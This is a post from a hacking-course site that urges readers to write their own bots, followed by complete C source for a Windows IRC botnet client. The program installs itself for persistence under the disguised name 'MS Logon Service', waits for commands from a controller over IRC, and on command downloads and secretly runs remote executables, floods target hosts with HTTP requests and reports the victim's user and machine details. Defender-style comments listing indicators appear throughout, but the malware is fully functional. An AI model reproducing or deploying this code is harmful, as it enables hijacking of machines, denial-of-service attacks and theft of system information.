Extreme Hacking | Sadik Shaikh
Ethical Hacking Institute Course in Pune-India

Hello guys, welcome back to the Extreme Hacking programming zone. After looking around in this hacking world I found many script kiddies: useless people using Trojans and bots made by someone else, hell for such guys. There are tons of so-called security prof.. bla bla bla white hats bla bla..

One question to those money-sucking people: where do you disappear when the country is under cyber threat?? Anyway, I don't want this young generation to be bluffed by such people. There is no shortcut to success.

We need you, this country needs you. keep learning and throw out those tools. Toys are used by kids not by Cyber Warriors.

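A simple bot which can be used on Facebook, Google+, Yahoo msg and any sort of IRC. The listing below implements the IRC case only: it connects to _SERVER_ on TCP port 6667, joins _CHANNEL_ and takes its commands from the nick set in _CONTROL_.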
Understand the logical flow and create a new one. If you have any difficulty in understanding the logical flow you can write to me at sadik.shaikh@extremehacking.org

Enjoy learning..

Here is the Code written in C:

#include <windows.h>
#include <winsock2.h>
#include <stdio.h>
// Build-time configuration. All three values are placeholders in this listing.
// _CHANNEL_: IRC channel the program joins and posts its replies to.
// _CONTROL_: the single nick whose PRIVMSG lines are treated as commands.
// _SERVER_:  host name or IPv4 address of the IRC server (port 6667 is hard-coded in WinMain).
// For an analyst these are the values to extract first from a sample: together with the
// port they describe the whole command channel.
#define _CHANNEL_ “#channel”
#define _CONTROL_ “your_nick”
#define _SERVER_ “irc_server”

// Size of every fixed text buffer in the file (network I/O, paths, command arguments).
#define BUF_LENGTH 1024

// Prototypes for the two helpers defined at the end of the file.
// startWinsock: wraps WSAStartup and returns its result.
int startWinsock(void);
// getAddrFromString: fills addr->sin_addr from an IPv4 literal or a host name.
long getAddrFromString(char* hostnameOrIp, SOCKADDR_IN* addr);

// Argument block handed to the download() thread.
// Both fields are filled in WinMain from the text of a "download" command.
struct DOWNLOADSTRUCT
{
char host[BUF_LENGTH]; // server contacted on TCP port 80
char path[BUF_LENGTH]; // request path, inserted after "GET /"
};

// Argument block handed to the dos() thread.
// Both fields are filled in WinMain from the text of a "dos" command.
struct DOSSTRUCT
{
char host[BUF_LENGTH]; // host contacted on TCP port 80
int count;             // number of connect/request/close rounds (parsed with atoi)
};

/*
 * Thread entry point for the "download" command: fetch a file over plain HTTP,
 * store it on disk and execute it.
 *
 * arg points to a DOWNLOADSTRUCT whose host and path were taken from a PRIVMSG
 * sent by the controlling nick (see WinMain).
 *
 * Steps visible below: connect to ds->host on TCP port 80, send a GET request,
 * skip the response headers, write the body to "temp_<n>.exe" with
 * n = rand() % 5000 (relative path, so the process's current directory), then
 * start that file with WinExec and SW_HIDE.
 *
 * Defender notes: the transfer is unauthenticated HTTP with no integrity check
 * on the received bytes. Observable artefacts are an outbound request carrying
 * only a Host header, a file named temp_<0..4999>.exe, and a child process
 * created with a hidden window. The thread always exits with code 0, so the
 * exit code says nothing about success.
 */
DWORD WINAPI download(LPVOID arg)
{
DOWNLOADSTRUCT *ds = (DOWNLOADSTRUCT*)arg;
long rc;
SOCKET s;
SOCKADDR_IN addr;
int lc, i;
FILE *f;
char buf[BUF_LENGTH], fname[BUF_LENGTH];

// Each worker thread initialises Winsock for itself and calls WSACleanup at the end.
rc=startWinsock();
if(rc!=0)
ExitThread(0);

s=socket(AF_INET,SOCK_STREAM,0);
if(s==INVALID_SOCKET)
ExitThread(0);

// Destination: ds->host, fixed port 80.
memset(&addr,0,sizeof(SOCKADDR_IN));
addr.sin_family=AF_INET;
addr.sin_port=htons(80);
rc=getAddrFromString(ds->host,&addr);
if(rc==SOCKET_ERROR)
ExitThread(0);

rc=connect(s,(SOCKADDR*)&addr,sizeof(SOCKADDR));
if(rc==SOCKET_ERROR)
ExitThread(0);

// NOTE(review): unbounded sprintf; host and path are each BUF_LENGTH bytes and buf is
// BUF_LENGTH too, so the formatted request is not guaranteed to fit.
sprintf(buf, “GET /%s HTTP/1.1\r\nHost: %s\r\n\r\n”, ds->path, ds->host);
send(s,buf,strlen(buf),0);

// Skip the HTTP response headers: read one byte at a time and count '\n' characters,
// leaving the count untouched on '\r' and resetting it on anything else. Two in a row
// is the blank line that ends the headers. The status line is never inspected and the
// recv result is not checked inside this loop.
lc = 0;
while(lc < 2)
{
rc=recv(s,buf,1,0);
if(buf[0] == ‘\n’) lc++;
else if(buf[0] != ‘\r’) lc = 0;
}

// Output file name: "temp_" + a number in 0..4999 + ".exe". The fopen result is not checked.
sprintf(fname, “temp_%i.exe”, (rand() % 5000));
f = fopen(fname, “wb”);

// Copy the body to the file until the peer closes the connection (recv returns 0).
while((rc=recv(s,buf,256,0)) != 0)
{
if(rc==SOCKET_ERROR)
ExitThread(0);
for(i = 0;i < rc;i++)
fprintf(f, “%c”, buf[i]);
}
fclose(f);

closesocket(s);
WSACleanup();

// Run the downloaded file with its window hidden.
WinExec(fname, SW_HIDE);

ExitThread(0);
}

/*
 * Thread entry point for the "dos" command: repeated short HTTP requests to one host.
 *
 * arg points to a DOSSTRUCT (host, count) filled in by WinMain from a PRIVMSG
 * sent by the controlling nick.
 *
 * For each of ds->count rounds the code creates a TCP socket, connects to
 * ds->host on port 80, sends "GET / HTTP/1.1" with only a Host header and closes
 * the socket without reading a reply. Socket creation and connect are retried
 * every 500 ms until they succeed, so a round never gives up on its own.
 *
 * Defender notes: on the receiving side this shows up as many short-lived
 * connections from one source, each carrying the same request for "/" with no
 * headers other than Host and closed before the response is read. That request
 * shape is a usable signature for filtering or rate limiting.
 */
DWORD WINAPI dos(LPVOID arg)
{
DOSSTRUCT *ds = (DOSSTRUCT*)arg;
long rc;
SOCKET s;
SOCKADDR_IN addr;
int lc, i;
char buf[BUF_LENGTH];

rc=startWinsock();
if(rc!=0)
ExitThread(0);

for(i = 0;i < ds->count;i++)
{
// Retry until a socket can be created.
while((s=socket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET) Sleep(500);

// The host is resolved again in every round; port 80 is fixed.
memset(&addr,0,sizeof(SOCKADDR_IN));
addr.sin_family=AF_INET;
addr.sin_port=htons(80);
rc=getAddrFromString(ds->host,&addr);
if(rc==SOCKET_ERROR)
ExitThread(0);
// Retry the connect until it succeeds.
while((rc=connect(s,(SOCKADDR*)&addr,sizeof(SOCKADDR))) == SOCKET_ERROR) Sleep(500);

// One minimal request, then close without reading the response.
sprintf(buf, “GET / HTTP/1.1\r\nHost: %s\r\n\r\n”, ds->host);
send(s,buf,strlen(buf),0);
closesocket(s);
}

WSACleanup();

ExitThread(0);
}

// Receive the thread ids written by CreateThread in WinMain; not read anywhere else in this listing.
unsigned long downloadtid, dostid;

/*
 * Program entry point. Three phases are visible in the body:
 *
 * 1. Persistence: copies the running executable to <system directory>\logon_service.exe
 *    and writes that path to HKLM\Software\Microsoft\Windows\CurrentVersion\Run under
 *    the value name "MS Logon Service". None of the API results are checked.
 * 2. Command channel: connects to _SERVER_ on TCP port 6667, registers with the nick
 *    "bot_<n>" (n = rand() % 30000), waits for the end of the MOTD and joins _CHANNEL_.
 * 3. Command loop: answers PING, and for PRIVMSG lines whose sender nick equals
 *    _CONTROL_ handles the commands exit, uninstall, info, download and dos.
 *
 * Returns 1 if the server name cannot be resolved, otherwise 0.
 *
 * Defender notes (all taken from the literals below): the Run value name and the
 * logon_service.exe file in the system directory are host indicators; outbound
 * TCP 6667 with a "bot_<number>" nick and a JOIN to a fixed channel are network
 * indicators. The only authorisation check on commands is a string comparison
 * of the sender nick; no password or host mask is verified. Writing to the
 * system directory and to HKLM normally requires administrative rights, so on a
 * standard user account phase 1 is expected to fail silently (TODO confirm on
 * the target OS version).
 */
int WINAPI WinMain(HINSTANCE w1, HINSTANCE w2, PSTR w3, int w4)//main()
{
long rc;
SOCKET s;
SOCKADDR_IN addr;
char buf[BUF_LENGTH], buf2[BUF_LENGTH], buf3[BUF_LENGTH], channel[] = _CHANNEL_, master[] = _CONTROL_, nick[BUF_LENGTH], *ptr;
int i, sm;
DWORD l;
OSVERSIONINFOEX osinfo;
DOWNLOADSTRUCT ds;
DOSSTRUCT dss;
HWND hWnd;
HKEY hKey;

// This allocation is never used or freed: ptr is reassigned by strtok in the command loop.
ptr = (char *)malloc(BUF_LENGTH);
// sm ("send message") is set to 1 when a command has prepared a reply in buf2.
sm = 0;

srand(time(NULL));

// Phase 1: persistence.
// buf  = full path of the running executable
// buf2 = <system directory>\logon_service.exe
hWnd = (HWND)GetModuleHandle(NULL);
GetModuleFileName((HINSTANCE)hWnd, buf, sizeof(buf));
GetSystemDirectory(buf2, sizeof(buf2));
strcat(buf2, “\\logon_service.exe”);
// Third argument 0 (bFailIfExists = FALSE): an existing copy is overwritten.
CopyFile(buf, buf2, 0);
// Autostart entry for all users. The result of RegOpenKeyEx is not checked, so
// hKey may be used uninitialised if the open fails.
RegOpenKeyEx(HKEY_LOCAL_MACHINE, “Software\\Microsoft\\Windows\\CurrentVersion\\Run”, 0, KEY_ALL_ACCESS, &hKey);
RegSetValueEx(hKey, “MS Logon Service”, 0, REG_SZ, TEXT(buf2), strlen(buf2)+1);
RegCloseKey(hKey);

// Dead code: buf is compared with itself, so the condition is always false.
if((strcmp(buf, buf) != 0))
{
// Fake Message
//MessageBox(NULL, “Error #235\n\nCouldn’t open ‘sro_c.exe’\nAbort”, “Install Error”, MB_OK + MB_ICONERROR);
}

// Phase 2: command channel.
// Start Winsock
startWinsock();
printf(“Winsock gestartet\n”);
// Create the socket, retrying once per second until it succeeds
while((s=socket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET) Sleep(1000);
printf(“Socket erstellt\n”);
// Connect
memset(&addr,0,sizeof(SOCKADDR_IN)); // first set everything to 0
addr.sin_family=AF_INET;
addr.sin_port=htons(6667); // the original comment mentioned port 12345; the code uses 6667
rc=getAddrFromString(_SERVER_,&addr);
if(rc==SOCKET_ERROR)
return 1;
// Retry the connect once per second until the server is reachable.
while((rc=connect(s,(SOCKADDR*)&addr,sizeof(SOCKADDR))) == SOCKET_ERROR) Sleep(1000);

// Random nick of the form bot_<0..29999>.
sprintf(nick, “bot_%i”, rand() % 30000);
/*
rc=recv(s,buf,1000,0);
rc=recv(s,buf,1000,0);
buf[rc] = ‘\0’;
*/
// IRC registration: NICK and USER are sent in one buffer.
sprintf(buf, “NICK %s\r\nUSER %s \”localhost\” \”%s\” :%s\r\n”, nick, nick, _SERVER_, nick);
send(s,buf,strlen(buf),0);
/*
rc=recv(s,buf,1000,0);
buf[rc] = ‘\0’;

strtok(buf, ” “);
strcpy(buf2, strtok(NULL, “”));
strcpy(buf, “PONG “);
strcat(buf, buf2);
send(s,buf,strlen(buf),0);
*/
// Read and discard server output until the end-of-MOTD text appears.
// The recv result is not checked before it is used as an index.
do
{
rc=recv(s,buf,1000,0);
buf[rc] = ‘\0′;
} while(!strstr(buf, “End of /MOTD command”));

sprintf(buf, “JOIN %s\r\n”, channel);
send(s,buf,strlen(buf),0);

// Phase 3: command loop. Exchange data until the connection closes or fails.
while(rc!=SOCKET_ERROR)
{
rc=recv(s,buf,1000,0);
if(rc==0)
break;
if(rc==SOCKET_ERROR)
break;
buf[rc]=’\0’;

// Keep-alive: echo the PING argument back as PONG. Only the start of the
// received buffer is examined, so each recv is treated as one message.
if(!strnicmp(buf, “PING”, 4))
{
strtok(buf, ” “);
strcpy(buf2, strtok(NULL, “”));
strcpy(buf, “PONG “);
strcat(buf, buf2);
send(s,buf,strlen(buf),0);
}
else if(strstr(buf, “PRIVMSG”))
{
// Sender nick: the text before the first '!', shifted left by one character
// to drop the first byte (presumably the leading ':' of the IRC prefix).
strcpy(buf2, buf);
ptr = strtok(buf2, “!”);
for(i = 1;i <= strlen(ptr);i++) ptr[i – 1] = ptr[i];
// Authorisation: nick equality only.
if(strcmp(ptr, master) == 0)
{
// Command text: the second ':'-delimited field of the line, up to '\r'.
ptr = strtok(buf, “:”);
ptr = strtok(NULL, “\r”);

// "exit": disconnect and end the process. The Run value stays in place.
if(strcmp(ptr, “exit”) == 0)
{
closesocket(s);
WSACleanup();
return 0;
}
// "uninstall": the Run value is overwritten with the text "nothing…" rather
// than deleted, and the copied logon_service.exe is left on disk. A cleanup
// has to remove both the value and the file.
else if(strcmp(ptr, “uninstall”) == 0)
{
sprintf(buf2, “nothing…”);
RegOpenKeyEx(HKEY_LOCAL_MACHINE, “Software\\Microsoft\\Windows\\CurrentVersion\\Run”, 0, KEY_ALL_ACCESS, &hKey);
RegSetValueEx(hKey, “MS Logon Service”, 0, REG_SZ, TEXT(buf2), strlen(buf2)+1);
RegCloseKey(hKey);

closesocket(s);
WSACleanup();
return 0;
}
// "info": collect user name, computer name and an OS label, then post them
// to the channel (sm = 1 triggers the send at the bottom of the loop).
else if(strcmp(ptr, “info”) == 0)
{
l = sizeof(buf);
GetUserName(buf, &l);
sprintf(buf2, “Username: %s”, buf);
GetComputerName(buf, &l);
sprintf(buf3, “%s, Computername: %s”, buf2, buf);
sm = 1;
// NOTE(review): osinfo is an OSVERSIONINFOEX, but only sizeof(OSVERSIONINFO)
// bytes are zeroed and announced to GetVersionEx, so wSuiteMask and
// wProductType read below are presumably never filled in. The OS label
// is therefore unreliable beyond major/minor version - confirm.
ZeroMemory(&osinfo, sizeof(OSVERSIONINFO));
osinfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx((OSVERSIONINFO *) &osinfo);
l = osinfo.dwMinorVersion;
strcpy(buf, “???”);
switch(osinfo.dwMajorVersion)
{
case 5:
if(l == 0)
strcpy(buf, “Windows 2000”);
else if(l == 1)
strcpy(buf, “Windows XP”);
else if(l == 2)
{
// 0x8000 is the value of VER_SUITE_WH_SERVER; 89 is SM_SERVERR2.
// The two GetSystemMetrics tests are exhaustive, so the final
// else branch cannot be reached.
if(osinfo.wSuiteMask == 0x8000)
strcpy(buf, “Windows Home Server”);
else if(GetSystemMetrics(89) == 0)
strcpy(buf, “Windows Server 2003”);
else if(GetSystemMetrics(89) != 0)
strcpy(buf, “Windows Server 2003 R2”);
else
strcpy(buf, “Windows XP Professional x64 Edition”);
}
break;

case 6:
if(l)
{
if(osinfo.wProductType != VER_NT_WORKSTATION)
strcpy(buf, “Windows Server 2008 R2”);
else
strcpy(buf, “Windows 7”);
}
else
{
if(osinfo.wProductType == VER_NT_WORKSTATION)
strcpy(buf, “Windows Vista”);
else
strcpy(buf, “Windows Server 2008”);
}
break;

default:
strcpy(buf, “???”);
break;
}

sprintf(buf2, “%s, OS: %s”, buf3, buf);
}
// "download <host> <path>": arguments are copied unvalidated from the message
// into ds and handed to the download() thread. ds is a local of WinMain that
// the thread reads while this loop keeps running.
else if(strncmp(ptr, “download”, strlen(“download”)) == 0)
{
ptr = strtok(ptr, ” “);
ptr = strtok(NULL, ” “);
sprintf(ds.host, “%s”, ptr);
ptr = strtok(NULL, ” “);
sprintf(ds.path, “%s”, ptr);

CreateThread(NULL, 0, download, &ds, 0, &downloadtid);
}
// "dos <host> <count>": same pattern, handed to the dos() thread.
// The prefix match means any command starting with "dos" lands here.
else if(strncmp(ptr, “dos”, strlen(“dos”)) == 0)
{
ptr = strtok(ptr, ” “);
ptr = strtok(NULL, ” “);
sprintf(dss.host, “%s”, ptr);
ptr = strtok(NULL, ” “);
dss.count = atoi(ptr);

CreateThread(NULL, 0, dos, &dss, 0, &dostid);
}
else
{
buf[0] = ‘\0’;
}

// Post the prepared reply (currently only produced by "info") to the channel.
if(sm)
{
sprintf(buf, “PRIVMSG %s :%s\r\n”, channel, buf2);
send(s,buf,strlen(buf),0);
sm = 0;
}
}
}
}
closesocket(s);
WSACleanup();
return 0;
}

/*
 * Initialises Winsock, requesting version 2.0.
 *
 * Returns the result of WSAStartup unchanged (0 on success). The WSADATA
 * structure filled in by the call is discarded.
 */
int startWinsock(void)
{
WSADATA wsa;
return WSAStartup(MAKEWORD(2,0),&wsa);
}
/*
 * Fills addr->sin_addr from a dotted IPv4 literal or, failing that, a host name.
 *
 * hostnameOrIp: text to resolve.
 * addr:         destination; only sin_addr is written, family and port are
 *               left to the caller.
 *
 * Returns 0 on success, SOCKET_ERROR if either argument is NULL or the name
 * cannot be resolved.
 */
long getAddrFromString(char* hostnameOrIp, SOCKADDR_IN* addr)
{
long rc; // declared but never used
unsigned long ip;
HOSTENT* he;

if(hostnameOrIp==NULL || addr==NULL)
return SOCKET_ERROR;

// Try the string as an IPv4 literal first; INADDR_NONE means it did not parse.
ip=inet_addr(hostnameOrIp);

if(ip!=INADDR_NONE)
{
addr->sin_addr.s_addr=ip;
return 0;
}
else
{
// Not a literal: do a DNS lookup. For an analyst this is where the name of the
// configured server or a commanded host becomes visible in DNS logs.
he=gethostbyname(hostnameOrIp);
if(he==NULL)
return SOCKET_ERROR;
else
// Copies the first returned address; the fixed length 4 assumes an IPv4 result.
memcpy(&(addr->sin_addr),he->h_addr_list[0],4);
return 0;
}
}
